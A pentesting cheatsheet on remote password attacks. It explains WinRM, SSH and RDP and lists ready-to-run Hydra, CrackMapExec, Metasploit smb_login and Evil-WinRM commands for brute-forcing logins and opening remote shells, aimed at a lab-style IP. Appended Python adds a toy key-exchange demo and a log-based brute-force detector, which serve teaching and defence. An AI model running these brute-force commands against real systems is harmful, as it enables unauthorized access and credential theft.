My Pentesting Cheatsheet

Remote password attacks


Last updated 6 months ago

Network services

WinRM

Windows Remote Management (WinRM) is the Microsoft implementation of the Web Services Management Protocol (WS-Management). It is a network protocol based on XML web services that uses the Simple Object Access Protocol (SOAP) for the remote management of Windows systems. It handles the communication between Web-Based Enterprise Management (WBEM) and Windows Management Instrumentation (WMI), which in turn can call the Distributed Component Object Model (DCOM).

However, for security reasons, WinRM must be activated and configured manually on Windows 10. Its exposure therefore depends heavily on the security of the domain or local network in which it is used. In most cases, certificates or only specific authentication mechanisms are used to increase its security. WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS).

A handy tool that we can use for our password attacks is CrackMapExec, which also supports other protocols such as SMB, LDAP, MSSQL, and more. We recommend reading the official documentation for this tool to become familiar with it.

Another handy tool for talking to the WinRM service is Evil-WinRM, which gives us an interactive shell over WinRM.

CrackMapExec

crackmapexec -h
crackmapexec smb -h
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

Evil-WinRM

Install: sudo gem install evil-winrm

evil-winrm -i <target-IP> -u <username> -p <password>

SSH

The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptographic operations/methods: symmetric encryption, asymmetric encryption, and hashing.

Symmetric Encryption

Symmetric encryption uses the same key for encryption and decryption. However, anyone who has access to the key could also access the transmitted data. Therefore, a key exchange procedure is needed for secure symmetric encryption. The Diffie-Hellman key exchange method is used for this purpose. If a third party intercepts the exchange, it cannot decrypt the messages, because the key itself is never transmitted; the server and client use the exchange to derive, independently, the secret key needed to access the data. Many different variants of the symmetric cipher system can be used, such as AES, Blowfish, 3DES, etc.

Asymmetric Encryption

Asymmetric encryption uses two SSH keys: a private key and a public key. The private key must remain secret because only it can decrypt the messages that have been encrypted with the public key. If an attacker obtains the private key, which is often not password protected, they will be able to log in to the system without credentials. Once a connection is established, the server uses the public key for initialization and authentication. If the client can decrypt the message, it holds the private key, and the SSH session can begin.

Hashing

The hashing method converts the transmitted data into another unique value using a mathematical algorithm that only works in one direction. SSH uses hashing to confirm the authenticity of messages.

Hydra - SSH

We can use a tool such as Hydra to brute force SSH. This is covered in depth in the Login Brute Forcing module.

hydra -L user.list -P password.list ssh://10.129.42.197

Remote Desktop Protocol (RDP)

Microsoft's Remote Desktop Protocol (RDP) is a network protocol that allows remote access to Windows systems, via TCP port 3389 by default.

Linux offers different clients to communicate with the desired server using the RDP protocol. These include Remmina, rdesktop, xfreerdp, and many others. For our purposes, we will work with xfreerdp.

Hydra - RDP

We can also use Hydra to perform RDP brute forcing.

hydra -L user.list -P password.list rdp://10.129.42.197
xfreerdp /v:<target-IP> /u:<username> /p:<password>

SMB

hydra -L user.list -P password.list smb://10.129.42.197

Older versions of Hydra might not support SMBv3; in that case, use the Metasploit smb_login scanner instead:

use auxiliary/scanner/smb/smb_login
set user_file username.list
set pass_file password.list
set rhosts 10.129.42.197
run

CrackMapExec can list the shares:

crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

and smbclient can interact with them:

smbclient -U user \\\\10.129.42.197\\SHARENAME
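The three SSH building blocks described in the SSH section above (a key exchange so the symmetric key never travels over the wire, a hash to derive that key, and a MAC to confirm message authenticity), shown as an added toy example in plain Python; this is not code from the cheatsheet and uses a deliberately tiny, constructed group (2**127 - 1, g = 5) that is unsuitable for real use.

```python
import hashlib
import hmac
import secrets

# Toy group parameters (constructed for this demo). 2**127 - 1 is a known Mersenne
# prime, but a 127-bit modulus is far too small for real key exchange.
P = 2**127 - 1
G = 5


def keypair(modulus=P, base=G):
    """Private exponent stays local; the public value g^priv mod p goes on the wire."""
    priv = secrets.randbelow(modulus - 3) + 2
    return priv, pow(base, priv, modulus)


def shared_secret(my_priv, their_pub, modulus=P):
    """Both sides compute g^(ab) mod p; only g^a and g^b were ever transmitted."""
    return pow(their_pub, my_priv, modulus)


def derive_key(secret):
    """Hash the agreed integer down to a fixed-size symmetric key (the one-way step)."""
    return hashlib.sha256(b"toy-ssh-kex" + secret.to_bytes(16, "big")).digest()


def tag(key, message):
    """Message authentication code so the receiver can verify authenticity."""
    return hmac.new(key, message, hashlib.sha256).digest()


def demo():
    """Run one exchange and report what client, server and an eavesdropper end up with."""
    c_priv, c_pub = keypair()          # client side
    s_priv, s_pub = keypair()          # server side
    k_client = derive_key(shared_secret(c_priv, s_pub))
    k_server = derive_key(shared_secret(s_priv, c_pub))
    msg = b"constructed sample record"  # constructed payload
    t = tag(k_client, msg)
    # An observer holds only c_pub and s_pub; combining them gives g^(a+b), not g^(ab).
    k_observer = derive_key(c_pub * s_pub % P)
    return {
        "keys_match": k_client == k_server,
        "tag_verified": hmac.compare_digest(t, tag(k_server, msg)),
        "tampered_rejected": not hmac.compare_digest(t, tag(k_server, msg + b"!")),
        "observer_key_matches": k_observer == k_client,
    }
```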
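From the defender's side, a wordlist run like the hydra -L/-P commands above leaves a recognisable trace in the SSH server log: many failed logons from one source, cycling through several usernames within seconds, sometimes followed by a success. The following Python is an added example (not from the cheatsheet) that parses constructed sshd auth.log lines and flags that pattern; the hostnames, IPs and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines in the syslog format used in /var/log/auth.log.
SAMPLE_LOG = """\
Mar  3 10:15:01 web01 sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 51001 ssh2
Mar  3 10:15:01 web01 sshd[2202]: Failed password for invalid user test from 198.51.100.7 port 51002 ssh2
Mar  3 10:15:02 web01 sshd[2203]: Failed password for root from 198.51.100.7 port 51003 ssh2
Mar  3 10:15:03 web01 sshd[2205]: Failed password for bob from 198.51.100.7 port 51005 ssh2
Mar  3 10:15:04 web01 sshd[2206]: Accepted password for bob from 198.51.100.7 port 51006 ssh2
Mar  3 10:20:30 web01 sshd[2300]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Mar  3 10:20:45 web01 sshd[2301]: Accepted password for alice from 192.0.2.10 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse(text, year=2024):
    """Return (timestamp, source_ip, username, accepted) tuples; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect(events, window_s=60, max_fail=4):
    """Flag each source IP with >= max_fail failed logons inside window_s seconds, listing
    the usernames tried and any account that then logged in successfully from that source."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e[3]]
        for i, first in enumerate(fails):
            run = [e for e in fails[i:] if (e[0] - first[0]).total_seconds() <= window_s]
            if len(run) >= max_fail:
                alerts[ip] = {
                    "failures": len(run),
                    "users": sorted({e[2] for e in run}),
                    "success_after": [e[2] for e in evs if e[3] and e[0] >= first[0]],
                }
                break
    return alerts
```

A single failure followed by a success from 192.0.2.10 is left alone; the 198.51.100.7 source is reported with the four usernames tried and the later successful logon as bob, which is the account to check first.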
